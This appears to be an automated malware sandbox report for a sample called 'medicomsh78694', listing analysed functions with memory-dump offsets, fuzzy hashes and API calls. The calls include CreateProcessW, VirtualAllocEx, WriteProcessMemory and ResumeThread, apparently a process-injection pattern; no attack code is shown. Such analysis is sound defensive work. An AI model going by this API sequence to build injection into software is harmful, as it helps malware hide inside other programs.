                                                                            Control-flow Graph: entry block 37d3e0-37d418 (rendered graph with executed/not-executed block highlighting omitted)
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: `!0m$fCl
                                                                            • API String ID: 0-1366227990
                                                                            • Opcode ID: d9fbb9bcbcc8620dac4c8e7786bd2dca2f442225b576726f420edf4abe702817
                                                                            • Instruction ID: 97968e337ee9844dd03ff79931e9a9787fc0632ab7e9e867ee784ed239c049b4
                                                                            • Opcode Fuzzy Hash: d9fbb9bcbcc8620dac4c8e7786bd2dca2f442225b576726f420edf4abe702817
                                                                            • Instruction Fuzzy Hash: DE41BE74B00205CFDB25DBA5D8167AE7BF6AF89304F108436E909DB381EB789D41CBA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph: entry block 37d6ca-37d6f3 (rendered graph with executed/not-executed block highlighting omitted)
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ID$,A
                                                                            • API String ID: 0-1239230618
                                                                            • Opcode ID: d47bc071736a233bd6a9ada079fd91ea73e87abdd0cbdfd39f5a5a3c4cf8580c
                                                                            • Instruction ID: b150c36f950ff6f873c7fddffb0216ad17371875b99e2ca1abbc10e8a8303f8a
                                                                            • Opcode Fuzzy Hash: d47bc071736a233bd6a9ada079fd91ea73e87abdd0cbdfd39f5a5a3c4cf8580c
                                                                            • Instruction Fuzzy Hash: DB313334B04244DFC7299FB8980067A37FAAF85304F10847AE60ADB395EB789C41C7A2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph: entry block 37ccc8-37ccd8 (rendered graph with executed/not-executed block highlighting omitted)
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: `!0m$`!0m
                                                                            • API String ID: 0-1225930514
                                                                            • Opcode ID: 3825d6c13fb9fe83b7a17f73d9a0405e4a4e7393da1c0311cec9714526efaed7
                                                                            • Instruction ID: 3341c42067640349bf04299ce32ceb328aacebab3431a2a8bfe617b7a1062567
                                                                            • Opcode Fuzzy Hash: 3825d6c13fb9fe83b7a17f73d9a0405e4a4e7393da1c0311cec9714526efaed7
                                                                            • Instruction Fuzzy Hash: EEF0823491420CEFDB2ADB98E5546ADB77AAB85305F2190A8D40A27790CB345F81EB51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph: entry block 44e400-44e496; CreateProcessW called in block 44e522-44e5ef (rendered graph with executed/not-executed block highlighting omitted)
                                                                            APIs
                                                                            • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0044E5DC
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.423042150.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_440000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: CreateProcess
                                                                            • String ID:
                                                                            • API String ID: 963392458-0
                                                                            • Opcode ID: 800fa3200525e6c0a1ba71a053406de823cd6beaf4128db02792020cdd9b49d0
                                                                            • Instruction ID: 3014867a4243c67dceae586bcd53695db7aea591095b2010b4927246b098476a
                                                                            • Opcode Fuzzy Hash: 800fa3200525e6c0a1ba71a053406de823cd6beaf4128db02792020cdd9b49d0
                                                                            • Instruction Fuzzy Hash: 4181DF74D00229DFDB20CFA5C840BDEBBB5BF19304F1095AAE509B7250EB749A89DF54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph: entry block 44efa8-44f017; WriteProcessMemory called in block 44f02e-44f08e (rendered graph with executed/not-executed block highlighting omitted)
                                                                            APIs
                                                                            • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0044F07E
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.423042150.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_440000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessWrite
                                                                            • String ID:
                                                                            • API String ID: 3559483778-0
                                                                            • Opcode ID: 0122888ed2e8235a016bee2cd9d22d277bc525280ff17a96916c116e72988581
                                                                            • Instruction ID: 9ef202ba63ae5a8697f23c3ab5c4a3deeb7fc85d3f7a7e49f99c3706e8225ef4
                                                                            • Opcode Fuzzy Hash: 0122888ed2e8235a016bee2cd9d22d277bc525280ff17a96916c116e72988581
                                                                            • Instruction Fuzzy Hash: 354178B5D012589FCF10CFA9D984ADEFBF1BB49314F24902AE918B7210D379AA45CF64
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph: entry block 44e970-44ea35, which calls ReadProcessMemory (rendered graph with executed/not-executed block highlighting omitted)
                                                                            APIs
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0044EA25
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.423042150.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_440000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessRead
                                                                            • String ID:
                                                                            • API String ID: 1726664587-0
                                                                            • Opcode ID: edafa6cafa3d4ac0b9a806a0d27e9f5528f346a22fc3e947faf22f67b14e1209
                                                                            • Instruction ID: 0d21742ca047e99f89e24a296883b90f084459a86d1336584ef68c618404e40d
                                                                            • Opcode Fuzzy Hash: edafa6cafa3d4ac0b9a806a0d27e9f5528f346a22fc3e947faf22f67b14e1209
                                                                            • Instruction Fuzzy Hash: 654178B9D002589FCF10CFAAD884ADEFBB5BB19310F10A02AE814B7210D375AA45CF65
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph: entry block 44ee98-44ef55, which calls VirtualAllocEx (rendered graph with executed/not-executed block highlighting omitted)
                                                                            APIs
                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0044EF45
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.423042150.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_440000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: bca8e952924159a4ae048946adbe535fb80e7bafab143d0fe6445229a8ccebac
                                                                            • Instruction ID: b46b1c5b31de1cf12b356bfa2c7c1c79a39cf76a670204632a51a0139c4eb696
                                                                            • Opcode Fuzzy Hash: bca8e952924159a4ae048946adbe535fb80e7bafab143d0fe6445229a8ccebac
                                                                            • Instruction Fuzzy Hash: 4B3178B8D002589FCF10CFA9D884ADEFBB5BB19310F20A01AE814B7310D375A945CF69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph: entry block 4491a8-44925f, which calls VirtualProtect (rendered graph with executed/not-executed block highlighting omitted)
                                                                            APIs
                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0044924F
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.423042150.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_440000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            • Opcode ID: 91eff4ba5944626a69b0b8999f2a4e47ad5efa4a23934f1f0fe18fd1920815f7
                                                                            • Instruction ID: 65899f9f38a8a95704036f2a3607aece08f59362b46c1f965079c70025347291
                                                                            • Opcode Fuzzy Hash: 91eff4ba5944626a69b0b8999f2a4e47ad5efa4a23934f1f0fe18fd1920815f7
                                                                            • Instruction Fuzzy Hash: 443199B9D002589FCF10CFA9E884ADEFBB4BB19310F24942AE814B7210D375AA45CF64
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph: entry block 44e858-44e8bc; Wow64SetThreadContext called in block 44e8d3-44e91a (rendered graph with executed/not-executed block highlighting omitted)
                                                                            APIs
                                                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 0044E90A
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.423042150.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_440000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: ContextThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 983334009-0
                                                                            • Opcode ID: 84678198285d55b8e5e6f2e2baec8b99ca44d753c0d686d4678b1a99b78e1834
                                                                            • Instruction ID: a65734617d2684b713d0d11fc3b055782ae92c9ae63c26d4d367fd206683c8fa
                                                                            • Opcode Fuzzy Hash: 84678198285d55b8e5e6f2e2baec8b99ca44d753c0d686d4678b1a99b78e1834
                                                                            • Instruction Fuzzy Hash: 2F318AB5D012589FDB10CFAAD884ADEFBF1BB49314F24902AE414B7250D378AA45CF54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph: entry block 44f1d0-44f25e, which calls ResumeThread (rendered graph with executed/not-executed block highlighting omitted)
                                                                            APIs
                                                                            • ResumeThread.KERNELBASE(?), ref: 0044F24E
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.423042150.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_440000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: ResumeThread
                                                                            • String ID:
                                                                            • API String ID: 947044025-0
                                                                            • Opcode ID: 39b136588a1aa79435d93d89b6f004537ffd43bf6674560cfa3a50c6282831f7
                                                                            • Instruction ID: 01223c4db221af44bb423c40d019dde205e2a9f5ce97b42893fb056581a615fe
                                                                            • Opcode Fuzzy Hash: 39b136588a1aa79435d93d89b6f004537ffd43bf6674560cfa3a50c6282831f7
                                                                            • Instruction Fuzzy Hash: 5A217AB8D002189FDB10CFA9E884ADEFBF4BB49314F24946AE814B7310D375A945CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph: entry block 370b00-370b2e (rendered graph with executed/not-executed block highlighting omitted)
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @20m
                                                                            • API String ID: 0-1912249801
                                                                            • Opcode ID: 679634f8a1df9763fc148556246b41a66090904705c3a58dac9362e3d3498ef9
                                                                            • Instruction ID: 3c7eaf42fd16c5b8bbb4a6a6199ea2c5d0a594bfdbfb6c74e1610a6ee782f00f
                                                                            • Opcode Fuzzy Hash: 679634f8a1df9763fc148556246b41a66090904705c3a58dac9362e3d3498ef9
                                                                            • Instruction Fuzzy Hash: 4591C374E00218CFDB29DFA4C994B9DBBF5AF49304F1085A9E509AB360DB34AE85DF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: fCl
                                                                            • API String ID: 0-625834680
                                                                            • Opcode ID: 88a6fb866daee78cfcfdb38b0b5c89767d8a1362fe2ea865b41763a3b3342c75
                                                                            • Instruction ID: 735b7e50350d2c540a8273e83bc517d094700ddb626f96433a71a6ef88d21b9e
                                                                            • Opcode Fuzzy Hash: 88a6fb866daee78cfcfdb38b0b5c89767d8a1362fe2ea865b41763a3b3342c75
                                                                            • Instruction Fuzzy Hash: 7F41DD74E052189FDB09DFA4E9509EEBBF2AF89300F10806AE805B7364DB355D46CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: fCl
                                                                            • API String ID: 0-625834680
                                                                            • Opcode ID: 63fb21df67fd6e9ee0e135d2c91e8c5ea77a8e5653d5a5e1e3aa6a75904c371b
                                                                            • Instruction ID: 0634cc4d1abc03d51c152c03f8c3e4cd13192ed1ae5358ee4710d284efe0ff61
                                                                            • Opcode Fuzzy Hash: 63fb21df67fd6e9ee0e135d2c91e8c5ea77a8e5653d5a5e1e3aa6a75904c371b
                                                                            • Instruction Fuzzy Hash: 42318D74E012189FDB08DFA5E9409EEBBF6EF88304F10842AE815B7754DB356942CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 995c67aa22b9c9fd9ca02df58b676ce4a1c665b674a9ec716f98dc332ed5ff72
                                                                            • Instruction ID: de35622e4fe861605b5d15c84b7217913e2c3fc0355a4ff277abe4ad33c4bb35
                                                                            • Opcode Fuzzy Hash: 995c67aa22b9c9fd9ca02df58b676ce4a1c665b674a9ec716f98dc332ed5ff72
                                                                            • Instruction Fuzzy Hash: E6B1DF74E00218CFDB25CFA8D885B9DFBB1BF49304F248569E859AB351DB74A985CF80
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 40fe59e8fcc007f5bb60f2d9f69752b2cd96c1c195c00db11945811f691eed6f
                                                                            • Instruction ID: 0c359793d28e8376653a56bfa4c546328e111d0e693c6dd1b735a04ab5699a22
                                                                            • Opcode Fuzzy Hash: 40fe59e8fcc007f5bb60f2d9f69752b2cd96c1c195c00db11945811f691eed6f
                                                                            • Instruction Fuzzy Hash: CDA1D074E002188FDB25CFA8C885BDDFBB1BF49304F2485A9E859AB351DB74A985CF44
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 11ac61b7aeb56a9fe16dd4f76fe8b73c7eee31625cfdcf14bd56296390399e29
                                                                            • Instruction ID: fd6d0290601fa688b098ee3bf99bdf2fa7f0aa158031f049a0b7bc8c5c28c741
                                                                            • Opcode Fuzzy Hash: 11ac61b7aeb56a9fe16dd4f76fe8b73c7eee31625cfdcf14bd56296390399e29
                                                                            • Instruction Fuzzy Hash: DA81C274A01208CFCB18DFB8D598AADBBB1FF49315F2184ADE419AB365DB35A841CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f6dc3544aa8d381069147b8f34fa1d1e45bc493bd6321ef45d86976e947809ed
                                                                            • Instruction ID: 9d27b9a2e6aa2b45c6b7aad9d84e4ee7f29e36e93007acc8df9f61d230bdd3cb
                                                                            • Opcode Fuzzy Hash: f6dc3544aa8d381069147b8f34fa1d1e45bc493bd6321ef45d86976e947809ed
                                                                            • Instruction Fuzzy Hash: F151AF78A04645DFDB21CBA9C440ABEB7F1FF48300F24C976E459A7696C7389D84CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0c47b2ea8c15f8838badcfb3f94fd4628c52d9239b71916c39cf922bb18726e8
                                                                            • Instruction ID: 8b97d3a49803eec49425389bf637451f5efe9ab76cb3ddf53395e0830dcab59a
                                                                            • Opcode Fuzzy Hash: 0c47b2ea8c15f8838badcfb3f94fd4628c52d9239b71916c39cf922bb18726e8
                                                                            • Instruction Fuzzy Hash: 2C51D874E001099FCB04EFA4D8909DEB7B2EF89304F5086AAD525BB355DB346E45CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e230fdf14963c1b16f4fc3dc6a1c24d91cb0deab49850ccc10f512755f135018
                                                                            • Instruction ID: 9feeb7115fa4cd1784bd033cf33129d2d44bf94c9d8ceb4ac1c3e88b9c54e059
                                                                            • Opcode Fuzzy Hash: e230fdf14963c1b16f4fc3dc6a1c24d91cb0deab49850ccc10f512755f135018
                                                                            • Instruction Fuzzy Hash: C951C474E001099FCB04EFA4D890ADEB7B2EF89304F1086A9E925B7355DB346E45CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cd349258228d8508348afd9e88e83edd8f85323ab28c71041cfa05f1866fe6b3
                                                                            • Instruction ID: ce51cba74b5da4b612db423b5073142bd6a70e9b143002bc8eb3d228563734d1
                                                                            • Opcode Fuzzy Hash: cd349258228d8508348afd9e88e83edd8f85323ab28c71041cfa05f1866fe6b3
                                                                            • Instruction Fuzzy Hash: 7351F370D04259DFDB19DFA9D8446EDBBB2FF88300F24812AD408B7294DB385A86CF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b715404f6fa5a8b7c044fb7d9145fbf62ce503e0b4363d33617e95e1b675f69c
                                                                            • Instruction ID: a2d75c2b09d4b02a658388bd24c0d301fcdbc787c4519ff443eb3682f3ce3dc8
                                                                            • Opcode Fuzzy Hash: b715404f6fa5a8b7c044fb7d9145fbf62ce503e0b4363d33617e95e1b675f69c
                                                                            • Instruction Fuzzy Hash: 8031C070E012189FCB54CFAAD5806EEBBF6AF88305F20902AE418B7254DB345A41CF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422816480.000000000018D000.00000040.00000001.sdmp, Offset: 0018D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_18d000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e03d47d829af3607288df63ed07f78307781e9f24ef6af17c8cf31474a0cad44
                                                                            • Instruction ID: 8c39aed12491136a6fa39428a6e4b4a6e9cfbb4335809c430bfc2ffb5c560235
                                                                            • Opcode Fuzzy Hash: e03d47d829af3607288df63ed07f78307781e9f24ef6af17c8cf31474a0cad44
                                                                            • Instruction Fuzzy Hash: 9721F275604304DFDB14EF64E884B16BB65EB84314F20C9A9E80A4B286C736D947CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422816480.000000000018D000.00000040.00000001.sdmp, Offset: 0018D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_18d000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 15ed6087bdcb983c8214ae262253c44f092b9dd08334fc1cd982a053ff9b983d
                                                                            • Instruction ID: e416f384512cea22fd2071b9fe7c96c7ac898dee1576d9446b42b1c1214ca546
                                                                            • Opcode Fuzzy Hash: 15ed6087bdcb983c8214ae262253c44f092b9dd08334fc1cd982a053ff9b983d
                                                                            • Instruction Fuzzy Hash: 79210471604304EFDB05EF54E9C0B26BBA6FB84314F20CAADE8094B282C336D946CF61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2b2e794d1f67bf090c5e7011aebf3bd7a13276c6dd24dc41ddb03b427b8f5565
                                                                            • Instruction ID: c4f8bc9e8c0b53bf084dc82127e9de868300a098e5c930c0f034221d40546a5c
                                                                            • Opcode Fuzzy Hash: 2b2e794d1f67bf090c5e7011aebf3bd7a13276c6dd24dc41ddb03b427b8f5565
                                                                            • Instruction Fuzzy Hash: AC219A71A05111CFC726CF68DC44AAABBA5FF08315F99C2B6E429DB296C338C945CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 34eb9804acfaf50be1393c3635db737140e2be1cc4e6ff5265ea4f2953283adf
                                                                            • Instruction ID: 2939909f32e34eea8ed5d7264f89b47b51a2884f5e1a5530287e0a13c776fee9
                                                                            • Opcode Fuzzy Hash: 34eb9804acfaf50be1393c3635db737140e2be1cc4e6ff5265ea4f2953283adf
                                                                            • Instruction Fuzzy Hash: 631102723085248FD3268A2CDC9466A7BB9EF86314F56C837E58FCB681D22ADC419791
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422816480.000000000018D000.00000040.00000001.sdmp, Offset: 0018D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_18d000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 705ada77aa18427fb7566f6aff9062515466c3b2fc1146b9a875443394fb7337
                                                                            • Instruction ID: aa5f22f0e12d6f26543010fbcfc7905eb7c89bd5444acdc47bd4a0a45ef8b849
                                                                            • Opcode Fuzzy Hash: 705ada77aa18427fb7566f6aff9062515466c3b2fc1146b9a875443394fb7337
                                                                            • Instruction Fuzzy Hash: 2F118B75504284DFCB12DF14E5C4B15BBA2FB84314F24C6A9D8494B696C33AD94ACFA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422816480.000000000018D000.00000040.00000001.sdmp, Offset: 0018D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_18d000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 705ada77aa18427fb7566f6aff9062515466c3b2fc1146b9a875443394fb7337
                                                                            • Instruction ID: dced52790ccc31726afdda55bd08a01545abc807c79c0391c66b6a3635918a42
                                                                            • Opcode Fuzzy Hash: 705ada77aa18427fb7566f6aff9062515466c3b2fc1146b9a875443394fb7337
                                                                            • Instruction Fuzzy Hash: 8811BE75504380CFCB11DF14E584B15BB61FB44314F24C6A9E8094B696C33AD90ACFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422686895.000000000016D000.00000040.00000001.sdmp, Offset: 0016D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_16d000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ce6e8b45adc492ff433db9c6497af3550baca0b7e082de52dacd4b5b61b7307d
                                                                            • Instruction ID: 21ea88d211337d5e2a3a80821ce70b8fff83a64968fb4b474ce47e9f3c637998
                                                                            • Opcode Fuzzy Hash: ce6e8b45adc492ff433db9c6497af3550baca0b7e082de52dacd4b5b61b7307d
                                                                            • Instruction Fuzzy Hash: F301F730D053409ADB108A65DC98B67FBDCEF51724F18C45EED051A282C374DC45C6B1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ab36d2d2afb91dc0dcceeca7ffb0b2dd67d6b6388a88f4d510092b9cfbe3ecea
                                                                            • Instruction ID: f8057dd975a6291e1880112682d04560857a6be316656b083801b765d4ffe799
                                                                            • Opcode Fuzzy Hash: ab36d2d2afb91dc0dcceeca7ffb0b2dd67d6b6388a88f4d510092b9cfbe3ecea
                                                                            • Instruction Fuzzy Hash: 91111774D093898FC742DFB9C8542AEBFF0AF4A300B1584DBD849EB262D7345A05DB62
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 82d1be37da0c115b8052a3913dfc3617b9d42b0fce370b3ab287cf2721bdacb8
                                                                            • Instruction ID: 8393851139cff5a4ba81468f2275672c7c30087274d40703ad7fbfafb927897e
                                                                            • Opcode Fuzzy Hash: 82d1be37da0c115b8052a3913dfc3617b9d42b0fce370b3ab287cf2721bdacb8
                                                                            • Instruction Fuzzy Hash: D80144709192889FD701DFA8C8047ADBFF4EF4A301F0680EAD858DB2A2E7349A44CB41
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

Non-executed Functions

Strings
Memory Dump Source
• Source File: 00000004.00000002.423042150.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
